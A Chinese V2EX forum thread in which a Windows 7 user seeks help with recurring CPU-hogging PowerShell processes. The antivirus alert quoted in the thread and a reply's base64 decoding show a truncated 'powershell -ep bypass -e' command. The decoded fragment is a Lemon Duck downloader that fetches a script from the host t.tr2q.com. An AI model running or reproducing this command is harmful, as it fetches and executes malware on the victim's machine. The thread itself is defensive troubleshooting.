昨天发现的, win7 被一堆“cmd 发起的 powershell”在后台疯狂占 cpu

2019-12-31 09:15:55 +08:00
 devwolf

毒霸是这样说的:“可疑程序运行后,可能会静默安装恶意软件,导致系统异常,建议您立即阻止。 行为发起 :C:\Windows\system32\cmd.EXE 可疑进程 :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 可疑内容 :powershell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ”

去金山那边查查,10 月份就有人反映了,但看起来是没解决 http://bbs.duba.net/thread-4191273570-1-1.html

相关的科普查了一下这个 https://www.freebuf.com/articles/network/216918.html 和这篇文中描述很像,一小时一次。

——当然,最快的法子是重装系统,但因为要搬数据,索性换电脑了(从小新 pro13 加到了联想拯救者然后跌回惠普星系列,上报时被主管强推硬是改成了戴尔游匣)。
3 号才到,旧笔记本还得撑一会儿,想让旧笔记本死个明白,求告知解决方案

目前已经试过的法子:照着网上能搜到的禁用 powershell 的法子,将所有人替换为了 admin,拿掉了 system 的权限,但还是时间一到,毒霸提示"cmd 又把 powshell 放出来吃 cpu 了"

3025 次点击
所在节点    问与答
12 条回复
BFDZ
2019-12-31 09:25:10 +08:00
进安全模式,用大蜘蛛扫描器全盘扫一遍
http://download.geo.drweb.com/pub/drweb/cureit/cureit.exe
w292614191
2019-12-31 09:54:22 +08:00
到 ‘我告诉你’ 去下载个系统?

不要使用 ‘番茄家园、雨林木风、老毛桃。。。。。。’
rssf
2019-12-31 09:57:06 +08:00
毒霸自己不就是个占用系统资源的病毒
dxgundam01
2019-12-31 09:58:54 +08:00
明显就是中毒啦,感觉重装啊
devwolf
2019-12-31 10:03:57 +08:00
楼上说的没错——
因为公司网速问题,大蜘蛛还没下好,先下了同事推荐的火绒。结果火绒一查,毒霸自己就是个开后门的二五仔,过会儿看看解决没
zhuangku556
2019-12-31 10:09:15 +08:00
还敢用金山系软件啊。。。
devwolf
2019-12-31 10:56:07 +08:00
https://www.landiannews.com/archives/67551.html
竟然是这个月 6 号的消息,还挺新的,解释了上面 5 楼 发现火绒能抓到金山这些后门。
6 楼 提到的也是,单纯因为之前那么多问题只要没轮到自己头上,就没换、关心的也少,
。。。笔者本身是挺缺少防患于未然的意识。
jin7
2019-12-31 14:04:31 +08:00
用 win10 自带的杀毒就保平安
Buges
2019-12-31 14:45:54 +08:00
$ echo JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ | base64 -d

$ L e m o n _ D u c k = ' l D C Q h Z t ' ; $ y = ' h t t p : / / t . t r 2 q . c o m / v . j s ' ; $ z = $ y + ' p ' + ' ? m i g _ 2 0 1 9 1 2 3 0 ' ; $ m = ( N e w - O b j base64:
invalid input
Buges
2019-12-31 14:47:08 +08:00
可以先把 t.tr2q.com 加到 hosts
devwolf
2019-12-31 16:27:23 +08:00
感谢大伙儿的热情相助。
所幸,笔者这边试着用火绒干掉一些扫出的病毒后,看上去是没再出现 powershell 了。姑且记作一个 win7 出现该问题的解决办法吧。
关于 8 楼 提到的,肯定的,下个新电脑笔者老老实实用 win10 了。

最后,祝各位元旦快乐。
cutlove
2019-12-31 16:34:45 +08:00
火绒再得一分

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/633761

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX